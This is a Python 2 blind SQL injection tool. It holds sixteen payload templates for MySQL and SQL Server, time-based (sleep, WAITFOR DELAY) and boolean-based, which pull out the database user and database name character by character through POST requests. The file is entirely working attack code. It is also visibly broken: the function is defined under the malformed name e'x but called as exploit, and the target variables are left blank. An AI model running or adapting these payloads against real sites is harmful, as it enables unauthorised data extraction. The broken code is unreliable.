#!/usr/bin/python
# coding=utf-8
# 
import httplib,time,string,sys,random,urllib

def getPayloadBody(body,i,payload,payload_type):

    ret = {}
    if payload_type == 1:
        s = str(random.random()) + "aa'XOR(if(ascii(mid(user(),%s,1))=%s,sleep(6),0))OR'bbb" % (i,ord(payload))
    elif payload_type == 2:
        s = str(random.random()) + "aa'XOR(if(ascii(mid(database(),%s,1))=%s,sleep(6),0))OR'bbb" % (i,ord(payload))
    elif payload_type == 3:
        s = str(random.random()) + "aa';if(ascii(substring(user,%s,1))=%s) WAITFOR DELAY '00:00:6'-- " % (i,ord(payload))
    elif payload_type == 4:
        s = str(random.random()) + "aa';if(ascii(substring(db_name(),%s,1))=%s) WAITFOR DELAY '00:00:6'-- " % (i,ord(payload))
    elif payload_type == 5:
        s = "if(ascii(mid(user(),%s,1))=%s,sleep(6),0)" % (i,ord(payload))
    elif payload_type == 6:
        s = "if(ascii(mid(database(),%s,1))=%s,sleep(6),0)" % (i,ord(payload))
    elif payload_type == 7:
        s = "-1;if(ascii(substring(user,%s,1))=%s) WAITFOR DELAY '00:00:6'-- " % (i,ord(payload))
    elif payload_type == 8:
        s = "-1';if(ascii(substring(db_name(),%s,1))=%s) WAITFOR DELAY '00:00:6'-- " % (i,ord(payload))
    elif payload_type == 9:
        s = "aa'));if(ascii(substring(user,%s,1))=%s) WAITFOR DELAY '00:00:6'-- " % (i,ord(payload))
    elif payload_type == 10:
        s = "aa'));if(ascii(substring(db_name(),%s,1))=%s) WAITFOR DELAY '00:00:6'-- " % (i,ord(payload))
    elif payload_type == 11:
        s = '"XOR(if(ascii(mid(user(),%s,1))=%s,sleep(6),0))OR"*/' % (i,ord(payload))
    elif payload_type == 12:
        s = '"XOR(if(ascii(mid(database(),%s,1))=%s,sleep(6),0))OR"*/' % (i,ord(payload))
    elif payload_type == 13:
        s = "3137 Laguna Street' AND ascii(mid(user(),%s,1))=%s AND '000DcAJ'='000DcAJ" % (i,ord(payload))
    elif payload_type == 14:
        s = "3137 Laguna Street' AND ascii(mid(database(),%s,1))=%s AND '000DcAJ'='000DcAJ" % (i,ord(payload))
    elif payload_type == 15:
        s = "phoneNumber=555-666-0606&userpassword=-1' OR ascii(substr(user, %s, 1))=%s AND 1=1 or 'RrJWZeG6'='" % (i,ord(payload))
    elif payload_type == 16:
        s = "sample@email.tst' AND ascii(mid(user(),%s,1))=%s AND '000xH0b'='000xH0b " % (i,ord(payload))
    for kv in body.split('&'):
        kv = kv.split('=')
        ret[kv[0]]=kv[1] if kv[1] != '*' else s
    return urllib.urlencode(ret)

def e'x(host,url,body,payload_type,true_dom,timeout=100):
    res = ''
    payloads = ['@','_','.']+ list(string.ascii_lowercase)+list(string.ascii_uppercase) +[str(i) for i in range(10) ]
    for i in range(1,30,1):
        for payload in payloads:
                conn = httplib.HTTPConnection(host, timeout=timeout)
                print payload,
                conn.request(method='POST',url=url,body=getPayloadBody(body,i,payload,payload_type),headers={'Content-Type': 'application/x-www-form-urlencoded'})
                sys.stdout.flush()
                html_dom= conn.getresponse().read().decode('utf-8')
                if html_dom.find(true_dom) != -1:
                    res += payload
                    print "\ncurrent result is",res
                    break
                conn.close()
    print res

if __name__=='__main__':
    host = 
    url= 
    body =
    true_dom =
    payload_type = 16
    exploit(host,url,body,payload_type,true_dom)
